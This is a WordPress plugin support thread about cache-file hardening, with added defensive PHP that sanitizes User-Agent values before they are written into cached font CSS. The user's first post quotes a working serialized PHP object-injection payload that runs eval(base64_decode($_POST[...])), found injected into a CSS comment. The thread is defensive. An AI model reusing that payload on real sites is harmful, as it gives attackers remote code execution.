• Wordfence notified me about some attempted code injection in a css file created by this plugin:

    /* Original-Document: https://fonts.googleapis.com/css?family=Libre+Franklin%3A300%2C300i%2C400%2C400i%2C600%2C600i%2C800%2C800i&subset=latin%2Clatin-ext for: }__test|O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";s:54:\"eval(base64_decode($_POST[111]));JFactory::get();exit;\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}e??? replaces: 8 , version: 4 */

    So I guess at some point your input should be sanitized?

    BTW, do you think user agent differentiation is really required? Because there are very very many different user agent strings…
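The header comment quoted above records the Google Fonts URL the stylesheet was fetched from and what it was fetched "for:", and the flagged serialized-object string sits exactly in that second slot. That is consistent with a request header (most likely the User-Agent the plugin varies its cache on) being copied into the CSS comment unmodified: the blob is harmless inside a comment, but a value that can close the comment with `*/` or carry NUL bytes is not something a cache writer should ever accept verbatim, and it is what triggers scanners such as Wordfence. The plugin's own code is not shown in this thread, so the following is an added example rather than the plugin's implementation; every function name, the `UA_CACHE_GROUPS` labels and the User-Agent grouping rules are assumptions chosen for illustration. The point it demonstrates is that nothing request-controlled reaches the file: the agent string is reduced to one of a fixed set of labels, the URL is validated and comment-escaped, and the cache file name is a hash.

```php
<?php
// Added example, not the plugin's own code. A font-caching plugin writes a header
// comment into each cached CSS file recording the Google Fonts URL and the agent
// group it was fetched for. Everything that originates in the request is reduced
// to a known-safe form before it is written, so a request can neither terminate
// the comment early nor smuggle arbitrary bytes into the stylesheet.

/** Fixed set of agent groups (assumed labels); only these are ever written to disk. */
const UA_CACHE_GROUPS = ['woff2', 'woff', 'ttf', 'default'];

/**
 * Map a User-Agent string to one of the fixed group labels.
 * The matching rules are illustrative; the property that matters is that the
 * return value is always a member of UA_CACHE_GROUPS, never the raw header.
 */
function ua_cache_group(string $user_agent): string
{
    if (preg_match('/Chrome\/|Firefox\/|Edg\//', $user_agent)) {
        return 'woff2';
    }
    if (preg_match('/MSIE |Trident\//', $user_agent)) {
        return 'woff';
    }
    if (preg_match('/Android 4\./', $user_agent)) {
        return 'ttf';
    }
    return 'default';
}

/**
 * Make a string safe to embed in a CSS comment:
 * keep printable ASCII only (drops NUL, control and non-ASCII bytes),
 * break every "*/" so the comment cannot be closed, and cap the length.
 */
function ua_cache_comment_safe(string $value, int $max = 300): string
{
    $clean = preg_replace('/[^\x20-\x7E]/', '', $value) ?? '';
    $clean = str_replace('*/', '* /', $clean);
    return substr($clean, 0, $max);
}

/** Accept only an https URL whose host is fonts.googleapis.com. */
function ua_cache_valid_fonts_url(string $url): bool
{
    $p = parse_url($url);
    return is_array($p)
        && ($p['scheme'] ?? '') === 'https'
        && ($p['host'] ?? '') === 'fonts.googleapis.com';
}

/** Build the header comment; refuses URLs the cache should not fetch at all. */
function ua_cache_header(string $url, string $user_agent, int $version): string
{
    if (!ua_cache_valid_fonts_url($url)) {
        throw new InvalidArgumentException('refusing to cache a non-Google-Fonts URL');
    }
    $group = ua_cache_group($user_agent);
    // The URL goes through the comment sanitiser too: even a valid URL can carry "*/" in its query string.
    return sprintf(
        "/* Original-Document: %s for: %s, version: %d */\n",
        ua_cache_comment_safe($url),
        $group,
        $version
    );
}

/** Cache file name derived from a hash, so neither the URL nor the agent string becomes part of a path. */
function ua_cache_file_name(string $url, string $user_agent): string
{
    return hash('sha256', $url . "\0" . ua_cache_group($user_agent)) . '.css';
}

// Demo on constructed input: a User-Agent that tries to close the comment and carries a NUL byte.
$url = 'https://fonts.googleapis.com/css?family=Libre+Franklin:300,400&subset=latin';
$ua  = "}*/ injected text \0 Mozilla/5.0 Chrome/90.0";
echo ua_cache_header($url, $ua, 4);
echo ua_cache_file_name($url, $ua), "\n";
```

Run with `php example.php`: the header that comes out names the group `woff2` instead of the agent string, and nothing from `$ua` appears in either the comment or the file name. If the raw agent string genuinely has to be recorded for debugging, pass it through `ua_cache_comment_safe()` as well rather than writing it directly.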

Viewing 1 replies (of 1 total)
  • Plugin Author E. Marten

    (@emarten)

    Hey, thanks for your feedback.
    Google delivers different css files and font formats depending on the browser agent string. But I am already grouping agents, so the load of forms will decrease.
    The plugin deletes unused css already.
    Greets, Eric

  • The topic ‘Sanitize your inputs’ is closed to new replies.